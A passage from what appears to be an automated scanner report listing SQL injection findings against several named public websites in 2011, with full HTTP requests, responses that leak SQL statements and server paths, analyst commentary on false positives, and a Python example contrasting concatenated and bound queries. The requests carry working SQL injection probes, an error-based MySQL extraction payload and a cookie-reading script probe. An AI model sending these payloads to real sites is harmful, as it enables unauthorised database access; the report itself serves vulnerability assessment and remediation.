GET /fb78970613'%20or%201%3d1--%20/scoreboard.asp?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 5321
Vary: Accept-Encoding
Cache-Control: private, max-age=10
Date: Fri, 18 Mar 2011 15:43:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.0 - Not Found</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 40px;}
ul.first,ol.first{margin-top:5px;}
fieldset{padding:0 15px 10px 15px;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px;
border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696;
border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;}
a:link,a:visited{color:#007EFF;font-weight:bold;}
a:hover{text-decoration:none;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;}
h4{font-size:1.2em;margin:10px 0 5px 0;
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif;
color:#FFF;background-color:#5C87B2;
}#content{margin:0 0 0 2%;position:relative;}
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
.config_source{background:#fff5c4;}
.content-container p{margin:0 0 10px 0;
}#details-left{width:35%;float:left;margin-right:2%;
}#details-right{width:63%;float:left;
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF;
background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal;
font-size:1em;color:#FFF;text-align:right;
}#ser
...[SNIP]...

Request 2

GET /fb78970613'%20or%201%3d2--%20/scoreboard.asp?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 18 Mar 2011 15:43:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.22. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nydailynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

As in 1.21, the two responses are both 404 Not Found and differ only because they were served by different back ends: Response 1 carries Server: Microsoft-IIS/6.0 and the generic IIS 6 page, Response 2 carries Server: Microsoft-IIS/7.0 and the IIS 7 detailed error page. The difference is load balancing, not a query, and the finding should be treated as a false positive.

Request 1

GET /fb/scoreboard.asp'%20and%201%3d1--%20?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 18 Mar 2011 15:43:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /fb/scoreboard.asp'%20and%201%3d2--%20?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 5276
Vary: Accept-Encoding
Cache-Control: private, max-age=3581
Date: Fri, 18 Mar 2011 15:43:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.0 - Not Found</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 40px;}
ul.first,ol.first{margin-top:5px;}
fieldset{padding:0 15px 10px 15px;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px;
border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696;
border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;}
a:link,a:visited{color:#007EFF;font-weight:bold;}
a:hover{text-decoration:none;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;}
h4{font-size:1.2em;margin:10px 0 5px 0;
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif;
color:#FFF;background-color:#5C87B2;
}#content{margin:0 0 0 2%;position:relative;}
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
.config_source{background:#fff5c4;}
.content-container p{margin:0 0 10px 0;
}#details-left{width:35%;float:left;margin-right:2%;
}#details-right{width:63%;float:left;
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF;
background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal;
font-size:1em;color:#FFF
...[SNIP]...

1.23. http://outils.icor.b2f-concept.net/newsletter/inscription_newsletter.php [org_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://outils.icor.b2f-concept.net
Path:   /newsletter/inscription_newsletter.php

Issue detail

The org_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the org_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The warning also discloses the absolute script path, so PHP display_errors is on in production; that is a separate information disclosure finding worth recording alongside the injection.

Request

GET /newsletter/inscription_newsletter.php?org_id=4'&crit_id=1&lan_code=FR HTTP/1.1
Host: outils.icor.b2f-concept.net
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Content-Length: 1125

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/web/outils.icor.b2f-concept.net/htdocs/newsletter/inscription_newsletter.php</b> on line <b>3
...[SNIP]...

1.24. http://parkcitytrips.com/booking_results.php [cloneID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cloneID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

In this case the error text in Response 1 settles the question: the leaked statement contains ecl.clone_id = 41 and 1=1-- verbatim, so the cloneID value is concatenated into the query, and the -- comment swallowed the remainder of the line, including the WHERE and GROUP BY clauses, which is why MySQL reports a GROUP column error. Response 2's error comes from a different statement (the groups_config query) and is triggered by the separate group_id payload rather than by cloneID. Confidence for this finding can be raised from Tentative to Certain.

Request 1

GET /booking_results.php?cloneID=41%20and%201%3d1--%20&rooms=1&nights=1&group_id=(select+1+and+row(1,1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1717
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=8ecd7vt2ql9krmdaujm3fog0c4; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT DISTINCT e.id as eventID, e.title, e.url, e.phone_1, e.phone_2, e.pic_fileName, e.smallDescription, e.latitude, e.longitude, e.inTrips, e.inBooking, e.inCalendar, e.inListing, e.inMap, e.geolocationString, ecat.start_Date, ecat.end_Date, erc.rating_category_id, sum(if(ev.field_id = 3, 1, 0)) as jrs_client, e.hide_image, e.hide_amenities, e.use_min_stay_field, e.large_image, e.zipcode, if(e.sort_rating is null,100,e.sort_rating) as sort_rating , et.title as localTitle, et.description as localDescription from events as e left join event_translations as et on e.id = et.event_id and et.locale = 'en' left join events_values as ev on e.id = ev.event_id left join events_rating_categories as erc on e.id = erc.event_id join events_categories as ecat on e.id = ecat.event_id and ecat.cat_id = 103 join events_clones as ecl on e.id = ecl.event_id and ecl.clone_id = 41 and 1=1-- where e.id in (1383,1384,1385,1386,1387,1388,1389,1390,1393,1394,1395,1396,1398,1399,1400,1401,1403,1405,1407,1410,1411,1413,1414,1415,1416,1418,1419,1421,1422,1423,1424,1425,1426,1427,1428,1429,1430,1431,1432,1434,1435,1436,1437,1438,1439,1441,1443,1448,1449,1450,1452,1453,1455,1456,1460,1462,1472,1492,1493,1494,1495,1496,1504,1505,1511,1570,1572,1573,1577,1579,1580,1730,1732,2578,7369,37578,37579,37580,37642,38674,41699,42689,42865) and ecat.start_Date <= '2011-03-24' and ecat.end_Date >= '2011-03-23' and ecat.inactiveDate = '0000-00-00' and ecl.inactiveDate = '0000-00-00' and e.inactive != 1 group by e.id ORDER BY position, title</i> Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Request 2

GET /booking_results.php?cloneID=41%20and%201%3d2--%20&rooms=1&nights=1&group_id=(select+1+and+row(1,1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=tobacig975l4ofd4v9ppm4sns5; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

1.25. http://parkcitytrips.com/booking_results.php [cloneID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The leaked statement shows the numeric id placed into the query without quotes or a cast, so an integer check on cloneID or a bound parameter would close both this finding and 1.24.

Request

GET /booking_results.php?cloneID=41'&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 276
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=gpc5j0u3qh0ufe2mhm4g0kuap4; path=/
Set-Cookie: SERVERID=i-07d1a66e; path=/
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
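
The errors in 1.23 through 1.27 all leak the statement with the request value spliced into it (WHERE id = 41' in 1.25, clone_id = 41 and 1=1-- in 1.24), which is the whole story: a numeric parameter concatenated into SQL text. The Python below is an added example, not code from the page or from the site, that rebuilds that pattern against an in-memory SQLite table (the table and its rows are constructed, named after the columns in the leaked query) and runs the scanner's quote probe and its 1=1/1=2 difference probe against both the concatenated and the bound form. The -- line comment behaves the same in SQLite as in MySQL, so the probes carry over unchanged.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the clones table named in the leaked query;
    the two columns are the ones the site's statement selects."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clones (id INTEGER PRIMARY KEY, "
                 "template_path TEXT, template_style TEXT)")
    conn.executemany("INSERT INTO clones VALUES (?, ?, ?)",
                     [(41, "/templates/parkcity", "winter"),
                      (42, "/templates/deervalley", "summer")])
    return conn


def lookup_concat(conn, clone_id: str):
    """Vulnerable: the request parameter is spliced into the SQL text, which
    is exactly what the leaked "WHERE id = 41'" statement shows the site doing."""
    sql = "SELECT template_path, template_style FROM clones WHERE id = " + clone_id
    return conn.execute(sql).fetchall()


def lookup_param(conn, clone_id: str):
    """Fixed: the value is bound, so whatever it contains is compared as data.
    A stray quote or an appended condition simply matches nothing."""
    sql = "SELECT template_path, template_style FROM clones WHERE id = ?"
    return conn.execute(sql, (clone_id,)).fetchall()


def boolean_probe(lookup, conn, value: str) -> bool:
    """The scanner's difference test from 1.24: append ' and 1=1-- ' and
    ' and 1=2-- ' and report whether the two outcomes differ. A database
    error counts as an outcome of its own, as it does in the report."""
    outcomes = []
    for cond in ("1=1", "1=2"):
        try:
            outcomes.append(("rows", lookup(conn, f"{value} and {cond}-- ")))
        except sqlite3.OperationalError as exc:
            outcomes.append(("error", str(exc)))
    return outcomes[0] != outcomes[1]


if __name__ == "__main__":
    conn = make_db()
    for value in ("41", "41'", "41 or 1=1-- "):
        for name, fn in (("concat", lookup_concat), ("param", lookup_param)):
            try:
                print(f"{name:6} {value!r:16} -> {fn(conn, value)}")
            except sqlite3.OperationalError as exc:
                print(f"{name:6} {value!r:16} -> error: {exc}")
    print("concat injectable:", boolean_probe(lookup_concat, conn, "41"))
    print("param  injectable:", boolean_probe(lookup_param, conn, "41"))
```

Against lookup_concat the single quote raises the same kind of syntax error the site returned, 41 or 1=1-- returns every clone, and the difference probe reports the parameter as injectable; against lookup_param the quote and the appended condition both return no rows, and the probe sees identical outcomes. Binding is sufficient on its own, but for an id that is always an integer an explicit int() check before the query is a cheap second line of defence.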

1.26. http://parkcitytrips.com/booking_results.php [group_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The group_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the group_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 494
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=r8nt2v1srok2onauc5d1hqg0t0; path=/
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.27. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/1'+1)) HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 18 Mar 2011 15:44:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Cache-control: private
Set-Cookie: PHPSESSID=q8vq0crnhoo9ce34trlmde7pa4; path=/
Set-Cookie: SERVERID=i-f3d4a39a; path=/
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1' 1))' at line 1

1.28. http://pixel.yola.com/LoggingAgent/LoggingAgent [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.yola.com
Path:   /LoggingAgent/LoggingAgent

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2557
Date: Fri, 18 Mar 2011 15:44:33 GMT
X-Varnish: 842362907
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u>
...[SNIP]...

Request 2

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 18
Date: Fri, 18 Mar 2011 15:44:33 GMT
X-Varnish: 842362925
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

//logged by Abacus

1.29. http://pixel.yola.com/LoggingAgent/LoggingAgent [sitereferer parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.yola.com
Path:   /LoggingAgent/LoggingAgent

Issue detail

The sitereferer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sitereferer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer='&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2557
Date: Fri, 18 Mar 2011 15:44:26 GMT
X-Varnish: 1748272546
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac90680:0; path=/

<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u>
...[SNIP]...

Request 2

GET /LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=''&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 18
